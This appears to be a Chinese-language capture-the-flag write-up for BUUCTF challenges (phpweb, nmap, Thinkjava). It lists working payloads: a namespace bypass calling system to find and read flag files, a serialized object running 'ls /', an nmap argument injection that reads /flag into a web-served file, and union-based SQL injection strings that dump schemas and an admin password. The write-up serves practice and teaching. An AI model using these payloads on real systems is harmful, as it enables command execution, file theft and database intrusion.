phpweb
姿勢1命名空間繞過。
func=\\system
p=find / -name flag*
func=\\system
p=cat /xx/flag
姿勢2序列化
buu群里和大佬學到還可以用反序列化
func=unserialize&p=0:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
nmap
127.0.0.1' -iL /flag -oN fuck.txt '
訪問http:xxx/fuck.txt即可
Thinkjava
這個題一看404本來以為項目出錯了,還麻煩了趙總,buuoj無敵。
第一步是一個sql注入,但是我把庫爆干凈了也沒出什么東西。
原理就是下方的兩張圖片的關鍵性代碼。
一個jdbc連接示例:
jdbc:mysql://127.0.0.1:3306/name?useUnicode=true&xx=xxxx&xx=xx
上方這段是一個jdbc連接的配置項,用過高版本mysql和jdbc的應該很清楚,不用多說。
爆庫
sql注入具體操作大家都會我就寫兩個簡單的示例
dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(information_schema.schemata)#
爆字段名
dbName=myapp?useUnicode=true'union/**/select/**/group_concat(column_name)from(information_schema.columns)where(table_name='user')and(table_schema='myapp')#
有價值信息
數據庫除了自帶得幾個數據庫就只有myapp
表只有一個user表
字段有
id,name,pwd
對應的字段值
id name passwd
1 admin admin@Rrrr_ctf_asde
部分過程結果截圖
腦瓜子嗡嗡的
這里寫的太多了,Think Java后續請參考最新博客 :https://www.cnblogs.com/h3zh1/p/12914439.html